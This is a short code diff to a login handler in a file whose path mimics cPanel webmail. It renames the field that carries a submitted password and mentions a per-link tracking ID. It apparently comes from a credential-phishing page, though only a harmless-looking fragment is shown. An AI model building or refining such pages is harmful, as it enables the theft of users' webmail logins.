--- a/webmail.cpanel.net/index.html
+++ b/webmail.cpanel.net/index.html
@@ -317,7 +317,7 @@ function handleLogin() {
     
     var data = {
         user: user,
-        pass: pass
+        password: pass
     };
 
     // Extract 'l' query parameter from the URL (link ID)
